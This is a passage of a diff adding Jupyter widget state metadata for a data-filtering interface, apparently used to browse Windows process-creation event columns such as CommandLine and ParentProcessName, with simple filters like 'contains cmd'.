+       "layout": "IPY_MODEL_01e9b5b9e2f948f8b02f10bd0e2d2581",
+       "style": "IPY_MODEL_8c75af75e9ff4248b52541ab1a1b21fe"
+      }
+     },
+     "4c0ef6df952c417ea2aad07c1cd21b20": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "70%"
+      }
+     },
+     "4d5f608bec20449094d83db8a84f208b": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "4da850c8e7b749f8b99cfc8a9f744214": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "4e297c36b90b4b4fa999fea2f992b72c": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "4fbba2de7b514444af1af3ac79dfa030": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "50d5ff5100bd40b4a05dc32b98c45991": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "AccordionModel",
+      "state": {
+       "_titles": {
+        "0": "Choose columns",
+        "1": "Filter data"
+       },
+       "children": [
+        "IPY_MODEL_6e12932cba8a4db38afd4129ecedb2d2",
+        "IPY_MODEL_d8963740d2844d74922276773cd3a13d"
+       ],
+       "layout": "IPY_MODEL_d738de016f5241e085832e853683bca7",
+       "selected_index": null
+      }
+     },
+     "51133fd46f5b40a9b4846a7375020529": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "Filter:",
+       "layout": "IPY_MODEL_6d09eafd05c34f6194cf64a3c85902d6",
+       "style": "IPY_MODEL_8ce0e47b9a7a4fe1a02502625c611010"
+      }
+     },
+     "531d46fde7f2414b8ed730e187bdf947": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "53edfbdbf8094668887e7fa7aca1277d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_830597ddd37d413aa19ce107456ec8e3",
+        "IPY_MODEL_ded1344fbb1d46aba120fa799197296e",
+        "IPY_MODEL_5ca4bc3a2cc545d1baf13cb08147b5ae",
+        "IPY_MODEL_b3b63660a07b4c618485f25aaded3a10"
+       ],
+       "layout": "IPY_MODEL_40a1ef478e2940c9ac816f6fe9a930bb"
+      }
+     },
+     "5498363e65024a7199085e67ac5862ac": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_c70f6096a87940608ecb1abad231842b",
+       "style": "IPY_MODEL_67662ed427e8407689f108ca7ab46553",
+       "value": " in "
+      }
+     },
+     "5518aabbc36d4a9ab670e196d89a79eb": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "56a988762bca49b1a916067527dc99c7": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "57fc931f1f6745b5b44d7360f6ee88f7": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "585ae97c11be4e9294df3faa0109e2e1": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectModel",
+      "state": {
+       "_options_labels": [
+        "ParentProcessName contains 'cmd'",
+        "CommandLine contains 'script'"
+       ],
+       "description": "Filters",
+       "index": 0,
+       "layout": "IPY_MODEL_3461b05d836b4737ac297ec975c7b068",
+       "style": "IPY_MODEL_290bdd1228a745eea5f8cef44549b607"
+      }
+     },
+     "58e88d32feee440798b623eab2c6e1ca": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "5a16de0528ff4f048b0f42acd30ac235": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_5d609325357946cd9eff5c6c6a932934",
+       "style": "IPY_MODEL_5c59820ba79f41c9aedd44c44da6717a"
+      }
+     },
+     "5c4e8097bca54b779cee09f7e6ad4084": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "5c59820ba79f41c9aedd44c44da6717a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "5ca4bc3a2cc545d1baf13cb08147b5ae": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DropdownModel",
+      "state": {
+       "_options_labels": [
+        "==",
+        ">",
+        "<",
+        ">=",
+        "<=",
+        "in",
+        "between",
+        "query"
+       ],
+       "index": 7,
+       "layout": "IPY_MODEL_1df078ffdbf340d2b70640a33b365c62",
+       "style": "IPY_MODEL_239c5c522a0c491f8ec97c7b46a3ca73"
+      }
+     },
+     "5d1d50dcb2994f94b1f68091db52194b": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "5d609325357946cd9eff5c6c6a932934": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "99%"
+      }
+     },
+     "5da7687c0c814881875c71408ab15f57": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "5dc40bae85f843089ee9cd9c23ba55a1": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Add filter",
+       "layout": "IPY_MODEL_112807c16f29483db116dcc6531c553a",
+       "style": "IPY_MODEL_cf88b195506e465585b9abaf1f824f41"
+      }
+     },
+     "5e4a9ab5687b4c44b42eae3e5cd53193": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_b22abd90c5ea4903b6cc5d3d2a84d802",
+        "IPY_MODEL_08852b76afe74c028723879733117fdd"
+       ],
+       "layout": "IPY_MODEL_1a44a4cf9c8b4dc382a8d021466c0d18"
+      }
+     },
+     "5ea3e5fb5bfe4f5fb9004a659d5dc3bb": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "5ecb8ec617804e2a9b295945d98f680d": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "5ecf764ff60340b793e302414cd0a417": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "5edf1b17f727492681224d545bbdc9da": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "5f3944eaf26044c5bfcb4c62815bf242": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "601cfccce4314248aecf44c3d43382fc": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "⇽ Remove All",
+       "layout": "IPY_MODEL_5518aabbc36d4a9ab670e196d89a79eb",
+       "style": "IPY_MODEL_62303da35e734238aa9610d29dff8b25"
+      }
+     },
+     "604b1293e471432cb5262e736892b57d": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "6194e41b56e9470090e9ade5fb082686": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "62303da35e734238aa9610d29dff8b25": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "64a381695b2548c68a01e87ef0162557": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_cd0cbccc70804b6a95707356c1292568",
+        "IPY_MODEL_ad3662e275b14795b7a09ffecdf1b070"
+       ],
+       "layout": "IPY_MODEL_4fbba2de7b514444af1af3ac79dfa030"
+      }
+     },
+     "6505786c126f496188cabc0e0cc7fbd1": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "650a6653093a4b51b357c79f7b3d5ba5": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_585ae97c11be4e9294df3faa0109e2e1",
+        "IPY_MODEL_64a381695b2548c68a01e87ef0162557"
+       ],
+       "layout": "IPY_MODEL_f88331d7df0c45e4b15afc2261ba564e"
+      }
+     },
+     "66ae56d26ca74fb4ad7ee2d96fe02815": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "66d6f1f9aacf406aa8e5222b4e95e897": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "66d7edd125c144388025e41cab4aa0ac": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "initial"
+      }
+     },
+     "67662ed427e8407689f108ca7ab46553": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "676fdbb9a65043568fd3c819d1cf7a3d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "67c2936988ff41e08c935ba701768ea6": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "67f4128b4e4e45a7991b0d4bf23a9b2a": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "67fe3434a66d4846b4aa6f8e77545022": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_1109323aa29e47dbac0b7a6a6d5beebe",
+        "IPY_MODEL_e8fa63f35d3f43c6b516ef58e8535d31"
+       ],
+       "layout": "IPY_MODEL_95d79867267445e1810542e2538a7a89"
+      }
+     },
+     "69b8bf72d11e4859b7a35c099b850558": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DropdownModel",
+      "state": {
+       "_options_labels": [
+        "==",
+        "contains",
+        "matches",
+        "in",
+        "between",
+        "query"
+       ],
+       "index": 0,
+       "layout": "IPY_MODEL_725654808c214705a72fba6e841d48bf",
+       "style": "IPY_MODEL_dfccb5d4237446459cc509270d55ba35"
+      }
+     },
+     "6a2925f0bd3e47dfb77c59fc9daf38e1": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "6b033d15e10549ca90024f3f548d9c90": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_25b1e0fc10ca44b2ac75941c3c5f90f4",
+        "IPY_MODEL_32112c3fe01b47168c8748f434d3839a"
+       ],
+       "layout": "IPY_MODEL_c3547c84759043b8aa461cb754754fd9"
+      }
+     },
+     "6c1f75ab44ac489a9fc4fdc265de7c60": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "6d09eafd05c34f6194cf64a3c85902d6": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "6db387e0ce73474ebbc9b81d9a6b65cc": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_604b1293e471432cb5262e736892b57d",
+       "style": "IPY_MODEL_06248439df564c268fb7ad0e58f35808",
+       "value": "Current filters"
+      }
+     },
+     "6df397a9bfef4fff85d638ea7ed64ba3": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "6e12932cba8a4db38afd4129ecedb2d2": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_e6e59154a9384db382274533a2321481",
+        "IPY_MODEL_ab22d75a7f3b42b8a4a778225fa2fb9d"
+       ],
+       "layout": "IPY_MODEL_b31376a38ee6457b89cc140165c1623f"
+      }
+     },
+     "6ec04674a0df4341a4b6a4304b7d9a43": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "6ff46ca9038444fb8984abd8082103fc": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "200px",
+       "width": "40%"
+      }
+     },
+     "700662f2d6474ed083f4288403c33847": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "80%"
+      }
+     },
+     "7059d69c5ec4412aa91247741509c2be": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextareaModel",
+      "state": {
+       "description": "Filter value",
+       "layout": "IPY_MODEL_b620d8158c6a4be4ae42c239258a8cbe",
+       "style": "IPY_MODEL_16d5d38a9798409d823cbb317fbe14e9"
+      }
+     },
+     "712734768b4d4aec99269b92b19a93f8": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "725654808c214705a72fba6e841d48bf": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "100px"
+      }
+     },
+     "73074bebabbf43e69ea59c5da5dbf945": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "150px",
+       "width": "300px"
+      }
+     },
+     "73ace9de6deb47e08240f8355a93cbf0": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectMultipleModel",
+      "state": {
+       "_options_labels": [
+        "Account",
+        "CommandLine",
+        "Computer",
+        "EventID",
+        "NewProcessId",
+        "NewProcessName",
+        "ParentProcessName",
+        "ProcessId",
+        "SourceComputerId",
+        "SubjectDomainName",
+        "SubjectLogonId",
+        "SubjectUserName",
+        "SubjectUserSid",
+        "TargetLogonId",
+        "TenantId",
+        "TimeCreatedUtc",
+        "TimeGenerated",
+        "TokenElevationType"
+       ],
+       "description": "Source: ",
+       "index": [],
+       "layout": "IPY_MODEL_f54de8691386447697961c9c868f9a29",
+       "rows": 5,
+       "style": "IPY_MODEL_5da7687c0c814881875c71408ab15f57"
+      }
+     },
+     "73d4b2b7a2004f4dab1647763895ad11": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "74c7f4c498954e67a0eee60214170b96": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "74fa9c71b0ec481a922dc864621ad54a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Add All ⇾",
+       "layout": "IPY_MODEL_712734768b4d4aec99269b92b19a93f8",
+       "style": "IPY_MODEL_24abd3bcd0b943878646456c006f379e"
+      }
+     },
+     "75aaf991c6b74e658fa302082b2b9ccb": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "7605ec55db4647adb49f7b24b15c8f31": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "7634458fadea4febba04fb37f6a2b441": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "765363db870c4e5fbc4aee6d8fa11a6e": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "77aeec9a3f0b4bf99eefad77b1f68dec": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_202bb3e71e2f4283a216400f17f82edc",
+        "IPY_MODEL_88d39abbcbe545f9bec07b67ecb929fc"
+       ],
+       "layout": "IPY_MODEL_b1ac544d401348f79719d22c32c26a1d"
+      }
+     },
+     "77e028053b3f49799406ea9d7cb56953": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectMultipleModel",
+      "state": {
+       "_options_labels": [
+        "Account",
+        "CommandLine",
+        "Computer",
+        "EventID",
+        "NewProcessName",
+        "ParentProcessName",
+        "TimeGenerated"
+       ],
+       "description": "Selected: ",
+       "index": [],
+       "layout": "IPY_MODEL_e66cc5687c9b491c82606ce504ad107c",
+       "rows": 5,
+       "style": "IPY_MODEL_d6aa34a7358d41baa5b43fd1af3699dd"
+      }
+     },
+     "791184a6b4e94f2897f8d7fa4f84d4a9": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "7af569788ca7405883d02f1967fa0ecd": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "7c0d2a8d8afe4197af41c37b702ea1f4": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Delete filter",
+       "layout": "IPY_MODEL_9f6748ce9fe141aca528ace24ba67cf7",
+       "style": "IPY_MODEL_199b9d5bf65c4041ab9d98dc20746b07"
+      }
+     },
+     "7ccb5b87754d479eb5e582d0342cc09c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Apply filter",
+       "layout": "IPY_MODEL_8a8c268c50274003b74105b6afe899f0",
+       "style": "IPY_MODEL_23a39ea52cdd48278e671f3d57a160cc"
+      }
+     },
+     "7faa7b2636ff49c081e8d4ceb6f0d5dc": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "8152896ed99a4cc6b948ea9e1cf1d5b1": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "822a4e905a5c44f8897cac7be18a6a66": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "825dae91b7d944c18fed6802e8b4d2d8": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "CheckboxModel",
+      "state": {
+       "description": "not",
+       "disabled": false,
+       "layout": "IPY_MODEL_aa02500b929b4d7180ec69a7cf20d591",
+       "style": "IPY_MODEL_848a1c3206864cf584b7757ef5ed5cd4",
+       "value": false
+      }
+     },
+     "830597ddd37d413aa19ce107456ec8e3": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DropdownModel",
+      "state": {
+       "_options_labels": [
+        "TenantId",
+        "Account",
+        "EventID",
+        "TimeGenerated",
+        "Computer",
+        "SubjectUserSid",
+        "SubjectUserName",
+        "SubjectDomainName",
+        "SubjectLogonId",
+        "NewProcessId",
+        "NewProcessName",
+        "TokenElevationType",
+        "ProcessId",
+        "CommandLine",
+        "ParentProcessName",
+        "TargetLogonId",
+        "SourceComputerId",
+        "TimeCreatedUtc"
+       ],
+       "index": 2,
+       "layout": "IPY_MODEL_b64198dc7a1d416b92e576c5ee7c2fd1",
+       "style": "IPY_MODEL_0dbc6f3f4b5c4b5bb4cd2158eac7abcc"
+      }
+     },
+     "8450c56dd9974440a252629859e30d02": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "848a1c3206864cf584b7757ef5ed5cd4": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "initial"
+      }
+     },
+     "84a9aec138164093a2e6067cd11155d1": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Add ⇾",
+       "layout": "IPY_MODEL_9c9fcc10bd104f4393f868e08dd758f5",
+       "style": "IPY_MODEL_23b18ed0935441fbad438828933dccc2"
+      }
+     },
+     "853b539b4a84472694072df83fc030af": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectMultipleModel",
+      "state": {
+       "_options_labels": [
+        "Account",
+        "CommandLine",
+        "Computer",
+        "EventID",
+        "NewProcessName",
+        "ParentProcessName",
+        "TimeGenerated"
+       ],
+       "description": "Selected: ",
+       "index": [],
+       "layout": "IPY_MODEL_f54de8691386447697961c9c868f9a29",
+       "rows": 5,
+       "style": "IPY_MODEL_0a721017793d455a820c6aeaf902ff33"
+      }
+     },
+     "85b9e3ef6fbe424aa297286fc8ff7b4d": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "500px"
+      }
+     },
+     "8603589afd034ef18837d15a44717d2a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextareaModel",
+      "state": {
+       "description": "Filter value",
+       "layout": "IPY_MODEL_2400b101ec914497b73951fbe1c94fad",
+       "style": "IPY_MODEL_7605ec55db4647adb49f7b24b15c8f31",
+       "value": "cmd"
+      }
+     },
+     "862dbc1d217e4445b93a96a17792661c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_ba1fe5d2378e441fb5560721c2ad905d",
+        "IPY_MODEL_a538297768214e9882732aa71ff00b2a",
+        "IPY_MODEL_05819ecfa0a84cb6bc1da256ad6b2806",
+        "IPY_MODEL_a49736614c4842248677b03304d4b3c0"
+       ],
+       "layout": "IPY_MODEL_d441f974166b4f72a2bafa678cbbded4"
+      }
+     },
+     "86cd6f31f32949a6adc24e7e36fae932": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Add ⇾",
+       "layout": "IPY_MODEL_e98ae86d25c84795a7adb7946fde3294",
+       "style": "IPY_MODEL_74c7f4c498954e67a0eee60214170b96"
+      }
+     },
+     "870b77088ecd4f34b282b3999a797551": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "876360ec6f7a40f29e2ddddb7499edfa": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "87a6fc1ffe7b41be9d94f49f0897ca1e": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_af35fa80fed04119bfab11dfaceb30e5",
+       "style": "IPY_MODEL_2356f1cfb7f14639aa485a76c074a82b",
+       "value": " in "
+      }
+     },
+     "883e0693211d44a7ad0cce63566515de": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Add ⇾",
+       "layout": "IPY_MODEL_e065ea541e08420c837b946865eb02cd",
+       "style": "IPY_MODEL_66ae56d26ca74fb4ad7ee2d96fe02815"
+      }
+     },
+     "88ac2326de314e9fb81828f0a49ab21e": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "88d39abbcbe545f9bec07b67ecb929fc": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_20dbae8cc26a401b99329ae9f19bfbef",
+        "IPY_MODEL_007afbb0564c460386581a0c37f92acc"
+       ],
+       "layout": "IPY_MODEL_67f4128b4e4e45a7991b0d4bf23a9b2a"
+      }
+     },
+     "88d5c49ce3144a1d90912d1b4e0e8f35": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "89cc2910803348458afee283b5741518": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "8a67fdf00af641aa8236734e0e0b35e1": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "99%"
+      }
+     },
+     "8a8c268c50274003b74105b6afe899f0": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "8c75af75e9ff4248b52541ab1a1b21fe": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "initial"
+      }
+     },
+     "8ce0e47b9a7a4fe1a02502625c611010": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "initial"
+      }
+     },
+     "8d41729e1a0044b5bdfd0914a98a1665": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "8ec127f5d9d74f068c9ce0043bc6f7c6": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "8f2dabeba3214a06916d46d79a842633": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "8f774e952712457980e7629729a12dd6": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "8f89a185ca434b478f868052fbcf355b": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "400px"
+      }
+     },
+     "9062d54a43f14eff95ada0765412d70c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DropdownModel",
+      "state": {
+       "_options_labels": [
+        "TenantId",
+        "Account",
+        "EventID",
+        "TimeGenerated",
+        "Computer",
+        "SubjectUserSid",
+        "SubjectUserName",
+        "SubjectDomainName",
+        "SubjectLogonId",
+        "NewProcessId",
+        "NewProcessName",
+        "TokenElevationType",
+        "ProcessId",
+        "CommandLine",
+        "ParentProcessName",
